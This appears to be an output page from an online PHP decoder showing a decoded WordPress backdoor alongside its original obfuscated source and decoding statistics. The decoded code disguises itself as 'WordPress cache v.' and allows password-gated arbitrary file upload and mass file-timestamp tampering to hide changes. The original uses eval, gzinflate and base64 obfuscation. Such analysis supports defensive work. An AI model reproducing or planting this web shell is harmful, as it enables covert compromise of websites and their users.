Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $yXcW3902 = "0tgxfjh3o.d_yu/zk5cine74;16*mlq(8rvwap9b2)s";$tGPTiR6676 = $yXcW3902[37..

Decoded Output download

if(!empty($_GET['cmd']))
{
$ch_result = '0';
$pcmd = $_GET['cmd'];
$pcmd = explode('-',$pcmd);
	if($pcmd[0] == 'touch')
	{
		if(preg_match('/^(0[1-9]|[12][0-9]|3[01])\.(0[1-9]|1[012])\.(19|20)\d\d$/',$pcmd[1]) && preg_match('/^([01]\d|2[0-4]):([0-5]\d):([0-5]\d)$/',$pcmd[2]))
		{
		$pdate = explode('.',$pcmd[1]);
		$ptime = explode(':',$pcmd[2]);
		$t_dir = './';
		$t_sdir=scandir($t_dir);
			foreach($t_sdir as $v)
			{
				if($v=='.' || $v=='..') continue;
			@touch($t_dir.$v, mktime($ptime[0], $ptime[1], $ptime[2], $pdate[1], $pdate[0], $pdate[2]));
			}
		 $ch_result = '1';
		}
	}
echo $ch_result;
}
if(isset($_POST['Submit'])){
	
	if(md5($_POST['password']) != 'd8e3e4d829c45abb34fb63a4f9cb42e1') exit(0);
	
    $filedir = '';
    $maxfile = '9999999';
  
    $wordpress_admin = $_FILES['image']['name'];
    $wordpress_tempary = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
        $wordpress = $filedir.$wordpress_admin;
        @move_uploaded_file($wordpress_tempary, $wordpress);
 
}
}
else{
echo'WordPress cache v.';
}
exit;?>

Did this file decode correctly?

Original Code

<?php $yXcW3902 = "0tgxfjh3o.d_yu/zk5cine74;16*mlq(8rvwap9b2)s";$tGPTiR6676 = $yXcW3902[37].$yXcW3902[33].$yXcW3902[21].$yXcW3902[2].$yXcW3902[11].$yXcW3902[33].$yXcW3902[21].$yXcW3902[37].$yXcW3902[29].$yXcW3902[36].$yXcW3902[18].$yXcW3902[21];$sUqywQS7506 = "".chr(101)."v".chr(97)."".chr(108)."(\x67".chr(122)."".chr(105)."\x6e".chr(102)."\x6C\x61".chr(116)."".chr(101)."\x28b\x61".chr(115)."e\x364\x5F".chr(100)."".chr(101)."cod\x65".chr(40)."";$bNp4045 = ")\x29".chr(41)."".chr(59)."";$q9420 = $sUqywQS7506."'bVNRb9owEH4Gif/gSlGdSBCSEKZSxNaXbpo0aZWYtIeQRSZ2ijVMothkVLD/vrOdlsAaCXL+7ru7z3cXXrg3TFTqxXWyL48/EpwLilPPG/SPg76Tb7Kayf1WoQXCAZ4DVAEBTl12B2aHaltS5uIRHhrMA2ePF645JEGKFpBJlft8g6FGD4r0tLuq2XMmiMo3Lh7/coMkHM3SUxJGaRJoa5IEYeqt/FdPCOfIAOHsFAXeiq6oM25rJkBFt7foKqlOsaKnCDLGqXcP59EUgI51zhCZFvSsPqeiRLHu7fxOpbmlKC4uKPedVJaiMspr3Uh/jF8RCdBC5mQHb9cyLLtXlDUjoLwlISKR0xhNVpRpm9MsFiAGnU7Imj72UF7uFN/tmc3zYJrd5vadZojEb63VtZJhJEPUmuHZjIypr92ixgzOpm6QLfBX/6PLVQntBbULfizflB0CuAAE9VxKpmDvnr4vYZWW+7XgSu+evp/dGkGnb/6KSPmnrPV2ohuoQe/YhMX0Lprl8ZSs15O4WH+YkLiY5es4YiF0gh24cgOjc9BH8DgF37J2ClqiwQQ5aFhjM/tYV+vWNWGTpMwIFXxndv/z12+PywRzQZ4ZThO8I4KZ7+AqQsGnReqXd2OUqLKLOF6gt5a8X8Dz0NFyL+vo/O3N/Gu983PAgygblu1hQQllNNMR7v9ih53EunXIjEuPcSvZ0U4T/wTGkymdw5Iy1PjYjlW3fP7p4z8='".$bNp4045;$tGPTiR6676($yXcW3902[14].$yXcW3902[9].$yXcW3902[27].$yXcW3902[14].$yXcW3902[21], $q9420  ,"438");

Function Calls

chr 14
gzinflate 2
preg_replace 1
base64_decode 2

Variables

$q9420 eval(gzinflate(base64_decode('bVNRb9owEH4Gif/gSlGdSBCSEKZSxN..
$bNp4045 )));
$yXcW3902 0tgxfjh3o.d_yu/zk5cine74;16*mlq(8rvwap9b2)s
$tGPTiR6676 preg_replace
$sUqywQS7506 eval(gzinflate(base64_decode(

Stats

MD5 dc9e4a9be209df5f467785de66178255
Eval Count 3
Decode Time 122 ms